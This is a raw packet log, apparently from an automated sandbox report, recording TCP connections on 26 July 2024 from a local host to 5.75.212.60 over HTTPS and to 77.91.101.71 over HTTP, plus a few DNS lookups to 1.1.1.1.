                                                                                                  Jul 26, 2024 19:58:37.787503958 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.787503958 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.787527084 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.787573099 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.804909945 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.804949045 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.804979086 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.804985046 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.805011034 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.805043936 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.816556931 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.816600084 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.816622972 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.816627979 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.816667080 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.816685915 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.824295998 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.824337959 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.824367046 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.824371099 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.824397087 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.824408054 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.833656073 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.833697081 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.833739042 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.833745003 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.833780050 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.833791971 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.849052906 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.849096060 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.849258900 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.849267006 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.849308968 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.858175039 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.858215094 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.858251095 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.858258009 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.858277082 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.858311892 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.865618944 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.865659952 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.865693092 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.865698099 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.865717888 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.865736961 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.872636080 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.872677088 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.872709990 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.872714996 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.872737885 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.872772932 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.878803015 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.878843069 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.878881931 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.878886938 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.878899097 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.878920078 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.923969030 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.924010038 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.924218893 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.924243927 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.924316883 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.929296970 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.929337025 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.929366112 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.929372072 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.929394007 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.929411888 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.935817003 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.935859919 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.935894966 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.935899019 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.935925007 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.935936928 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.949953079 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.950007915 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.950047970 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.950057983 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.950084925 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.950114012 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.955595970 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.955640078 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.955663919 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.955668926 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.955692053 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.955708027 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.960701942 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.960748911 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.960774899 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.960779905 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.960804939 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.960819960 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.982382059 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.982440948 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.982558012 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.982558012 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.982584000 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.982631922 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.986943960 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.986989021 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.987010956 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.987015963 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.987039089 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.987050056 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:38.002142906 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:38.002187967 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:38.002213955 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:38.002218008 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:38.002243042 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:38.002260923 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:38.006278992 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:38.006320000 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:38.006349087 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:38.006354094 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:38.006372929 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:38.006392002 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:38.010114908 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:38.010153055 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:38.010180950 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:38.010185957 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:38.010205030 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:38.010224104 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:38.028834105 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:38.028875113 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:38.028908014 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:38.028913021 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:38.028937101 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:38.028953075 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:38.032741070 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:38.032779932 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:38.032823086 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:38.032828093 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:38.032850981 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:38.032859087 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:38.035778046 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:38.035840034 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:38.035859108 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:38.035911083 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:38.035924911 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:38.035945892 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:38.035948992 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:38.035990953 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:38.036036015 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:38.036037922 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:38.036052942 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:38.036062002 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:38.036084890 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:38.036103964 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:38.334464073 CEST49727443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:38.334551096 CEST443497275.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:38.334644079 CEST49727443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:38.334858894 CEST49727443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:38.334897995 CEST443497275.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:39.089369059 CEST443497275.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:39.089458942 CEST49727443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:39.089904070 CEST49727443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:39.089931011 CEST443497275.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:39.091527939 CEST49727443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:39.091540098 CEST443497275.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:39.091578960 CEST49727443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:39.091593981 CEST443497275.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:39.573533058 CEST49728443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:39.573575974 CEST443497285.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:39.573651075 CEST49728443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:39.574084997 CEST49728443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:39.574106932 CEST443497285.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:39.764928102 CEST443497275.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:39.765100956 CEST443497275.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:39.765130997 CEST49727443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:39.765182972 CEST49727443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:39.765980959 CEST49727443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:39.766014099 CEST443497275.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:40.259574890 CEST443497285.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:40.259772062 CEST49728443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:40.260128021 CEST49728443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:40.260180950 CEST443497285.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:40.261981964 CEST49728443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:40.262037039 CEST443497285.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:40.906855106 CEST443497285.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:40.906904936 CEST443497285.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:40.907051086 CEST443497285.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:40.907078028 CEST49728443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:40.907078028 CEST49728443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:40.907157898 CEST49728443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:40.907407045 CEST49728443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:40.907470942 CEST443497285.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:40.909564972 CEST49729443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:40.909645081 CEST443497295.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:40.909727097 CEST49729443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:40.909975052 CEST49729443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:40.910007000 CEST443497295.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:41.582992077 CEST443497295.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:41.583180904 CEST49729443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:41.583595037 CEST49729443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:41.583615065 CEST443497295.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:41.585220098 CEST49729443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:41.585232019 CEST443497295.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:42.254292011 CEST443497295.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:42.254343033 CEST443497295.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:42.254426003 CEST49729443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:42.254478931 CEST443497295.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:42.254508018 CEST443497295.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:42.254508972 CEST49729443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:42.254534006 CEST49729443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:42.254561901 CEST49729443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:42.254781961 CEST49729443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:42.254811049 CEST443497295.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:42.276523113 CEST49730443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:42.276566029 CEST443497305.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:42.276658058 CEST49730443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:42.276911020 CEST49730443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:42.276937962 CEST443497305.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:42.938189983 CEST443497305.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:42.938290119 CEST49730443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:42.938776970 CEST49730443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:42.938797951 CEST443497305.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:42.940563917 CEST49730443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:42.940576077 CEST443497305.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:43.576369047 CEST443497305.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:43.576494932 CEST49730443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:43.576530933 CEST443497305.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:43.576565027 CEST443497305.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:43.576594114 CEST49730443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:43.576622963 CEST49730443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:43.577445984 CEST49730443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:43.577475071 CEST443497305.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:44.347414970 CEST49731443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:44.347501993 CEST443497315.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:44.347589970 CEST49731443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:44.348360062 CEST49731443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:44.348397970 CEST443497315.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:45.001502991 CEST443497315.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:45.001632929 CEST49731443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:45.002038002 CEST49731443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:45.002065897 CEST443497315.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:45.003922939 CEST49731443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:45.003937006 CEST443497315.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:45.004015923 CEST49731443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:45.004039049 CEST443497315.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:45.004054070 CEST49731443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:45.004065037 CEST443497315.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:45.004096985 CEST49731443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:45.004108906 CEST443497315.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:45.004196882 CEST49731443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:45.004220009 CEST443497315.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:45.004245043 CEST49731443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:45.004265070 CEST443497315.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:45.004332066 CEST49731443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:45.004388094 CEST49731443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:45.004432917 CEST443497315.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:45.004663944 CEST49731443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:45.004693985 CEST49731443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:45.004808903 CEST443497315.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:45.004848957 CEST443497315.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:45.004885912 CEST49731443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:45.004924059 CEST49731443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:45.005106926 CEST443497315.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:46.219654083 CEST443497315.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:46.219821930 CEST443497315.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:46.219923973 CEST49731443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:46.219924927 CEST49731443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:46.220264912 CEST49731443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:46.220333099 CEST443497315.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:46.267620087 CEST49732443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:46.267709017 CEST443497325.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:46.267786980 CEST49732443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:46.268084049 CEST49732443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:46.268119097 CEST443497325.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:47.015161037 CEST443497325.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:47.016652107 CEST49732443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:47.017087936 CEST49732443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:47.017111063 CEST443497325.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:47.018722057 CEST49732443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:47.018734932 CEST443497325.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:47.697335958 CEST443497325.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:47.697458982 CEST49732443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:47.697482109 CEST443497325.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:47.697576046 CEST49732443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:47.697663069 CEST49732443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:47.697700024 CEST443497325.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:47.698916912 CEST49733443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:47.699002981 CEST443497335.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:47.699103117 CEST49733443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:47.699332952 CEST49733443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:47.699368954 CEST443497335.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:48.364176989 CEST443497335.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:48.364413977 CEST49733443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:48.364804029 CEST49733443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:48.364857912 CEST443497335.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:48.366161108 CEST49733443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:48.366178036 CEST443497335.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:49.012876987 CEST443497335.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:49.012967110 CEST443497335.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:49.013061047 CEST49733443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:49.013061047 CEST49733443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:49.013151884 CEST49733443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:49.013190985 CEST443497335.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:49.034116983 CEST4973480192.168.2.577.91.101.71
                                                                                                  Jul 26, 2024 19:58:49.043857098 CEST804973477.91.101.71192.168.2.5
                                                                                                  Jul 26, 2024 19:58:49.043946028 CEST4973480192.168.2.577.91.101.71
                                                                                                  Jul 26, 2024 19:58:49.044064045 CEST4973480192.168.2.577.91.101.71
                                                                                                  Jul 26, 2024 19:58:49.044167995 CEST4973480192.168.2.577.91.101.71
                                                                                                  Jul 26, 2024 19:58:49.050983906 CEST804973477.91.101.71192.168.2.5
                                                                                                  Jul 26, 2024 19:58:49.051197052 CEST804973477.91.101.71192.168.2.5
                                                                                                  Jul 26, 2024 19:58:49.051228046 CEST804973477.91.101.71192.168.2.5
                                                                                                  Jul 26, 2024 19:58:49.051259995 CEST804973477.91.101.71192.168.2.5
                                                                                                  Jul 26, 2024 19:58:49.953210115 CEST804973477.91.101.71192.168.2.5
                                                                                                  Jul 26, 2024 19:58:49.953417063 CEST4973480192.168.2.577.91.101.71
                                                                                                  Jul 26, 2024 19:58:52.727767944 CEST4973480192.168.2.577.91.101.71

                                                                                                  UDP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Jul 26, 2024 19:57:59.214076996 CEST5211153192.168.2.51.1.1.1
                                                                                                  Jul 26, 2024 19:57:59.225172043 CEST53521111.1.1.1192.168.2.5
                                                                                                  Jul 26, 2024 19:58:10.498976946 CEST5762653192.168.2.51.1.1.1
                                                                                                  Jul 26, 2024 19:58:10.506475925 CEST53576261.1.1.1192.168.2.5
                                                                                                  Jul 26, 2024 19:58:49.023668051 CEST6035853192.168.2.51.1.1.1
                                                                                                  Jul 26, 2024 19:58:49.033422947 CEST53603581.1.1.1192.168.2.5

                                                                                                  DNS Queries

                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
